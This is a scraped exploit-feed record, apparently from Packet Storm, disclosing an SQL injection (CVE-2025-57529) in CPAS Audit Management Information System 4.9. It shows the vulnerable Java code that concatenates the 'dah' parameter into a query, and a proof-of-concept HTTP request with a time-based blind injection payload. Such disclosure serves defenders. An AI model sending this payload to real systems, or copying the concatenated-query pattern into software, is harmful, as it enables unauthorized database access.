{“lastseen”:”2025-09-30T16:29:32″,”description”:”CPAS………………………………”,”published”:”2025-09-30T00:00:00″,”modified”:”2025-09-30T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 CPAS Audit Management Information System 4.9 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:209990″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-57529″],”sourceData”:”# CPAS-bug\\n CPAS audit management information system has SQL injection vulnerability\\n \\n # Beijing YouDataSum Technology Co., Ltd.\\n domain: http:\/\/youdatasum.com\\n \\u003cimg width=\\”1474\\” height=\\”844\\” alt=\\”\u56fe\u7247\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/3e165cf6-1640-445a-be76-c403a26f08ef\\” \/\\u003e\\n \\n # Affected versions\\n “`\\n \\u003c=v4.9\\n “`\\n \\n # Vulnerability code analysis\\n \\n com\/yonyou\/aco\/cpas\/list\/web\/CpasListController.java line: 1545\\n “`\\n @RequestMapping({\\”\/findArchiveReportByDah\\”})\\n @ResponseBody\\n public DataGridView\\u003cMap\\u003cString, String\\u003e\\u003e findArchiveReportByDah(@RequestParam(value = \\”pageNum\\”, defaultValue = \\”0\\”) int pageNum, @RequestParam(value = \\”pageSize\\”, defaultValue = \\”10\\”) int pageSize, @RequestParam(value = \\”sortName\\”, defaultValue = \\”\\”) String sortName, @RequestParam(value = \\”sortOrder\\”, defaultValue = \\”\\”) String sortOrder, @RequestParam(value = \\”dah\\”, defaultValue = \\”\\”) String dah) {\\n \\tDataGridView\\u003cMap\\u003cString, String\\u003e\\u003e page = new DataGridView\\u003c\\u003e();\\n \\tif (pageNum != 0) {\\n \\t\\ttry {\\n \\t\\t\\tpageNum \/= pageSize;\\n \\t\\t} catch (Exception e) {\\n \\t\\t\\te.printStackTrace();\\n \\t\\t}\\n \\t}\\n \\tPageResult\\u003cMap\\u003cString, String\\u003e\\u003e pages = this.cpasListService.findArchiveReportByDah(pageNum + 1, pageSize, sortName, sortOrder, dah);\\n \\tif (pages != null) {\\n \\t\\tpage.setRows(pages.getResults());\\n \\t\\tpage.setTotal(pages.getTotalrecord());\\n \\t}\\n \\treturn page;\\n }\\n “`\\n \\n com\/yonyou\/aco\/cpas\/list\/service\/impl\/CpasListServiceImpl.java line: 8763\\n “`\\n @Override \/\/ com.yonyou.aco.cpas.list.service.ICpasListService\\n public PageResult\\u003cMap\\u003cString, String\\u003e\\u003e findArchiveReportByDah(int pageNum, int pageSize, String sortName, String sortOrder, String dah) {\\n \\tStringBuilder sb = new StringBuilder();\\n \\tsb.append(\\”select c.ywmc_,c.ywmcName_,a.* from fd_cpashbggdsq c \\”);\\n \\tsb.append(\\” left join bpm_ru_biz_info b on c.id = b.ID_ \\”);\\n \\tsb.append(\\” left join FD_CPASbglb a on c.id = a.biz_id \\”);\\n \\tsb.append(\\” where b.DR_ = ‘N’ and b.STATE_ = ‘2’ and c.dah = ‘\\” + dah + \\”‘ \\”);\\n \\tsb.append(\\” ORDER BY c.ts DESC\\”);\\n \\treturn this.cpasListDao.getPageData(pageNum, pageSize, sb.toString());\\n }\\n “`\\n \\n The CpasListServiceImpl.java file contains concatenated SQL statements, resulting in SQL injection\\n \\n POC:\\n “`\\n POST \/cpasm4\/cpasList\/findArchiveReportByDah HTTP\/1.1\\n Host: \\n User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko\/20100101 Firefox\/141.0\\n Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\\n Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\\n Accept-Encoding: gzip, deflate\\n Connection: close\\n Upgrade-Insecure-Requests: 1\\n Priority: u=0, i\\n Content-Type: application\/x-www-form-urlencoded\\n Content-Length: 69\\n \\n dah=0’ AND (SELECT 6451 FROM (SELECT(SLEEP(5)))oufm) AND ‘lRBm’=’lRBm\\n “`\\n \\n \\u003cimg width=\\”895\\” height=\\”290\\” alt=\\”\u56fe\u7247\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/be5366e0-1278-4eef-9786-f1b0cd4b04b9\\” \/\\u003e”,”sourceHref”:”https:\/\/packetstorm.news\/download\/209990″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/209990\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-09-30T16:29:32″,”description”:”CPAS………………………………”,”published”:”2025-09-30T00:00:00″,”modified”:”2025-09-30T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 CPAS Audit Management Information System 4.9 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:209990″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-57529″],”sourceData”:”# CPAS-bug\\n CPAS audit management information system has SQL injection vulnerability\\n \\n # Beijing YouDataSum Technology Co.,…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-19714","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n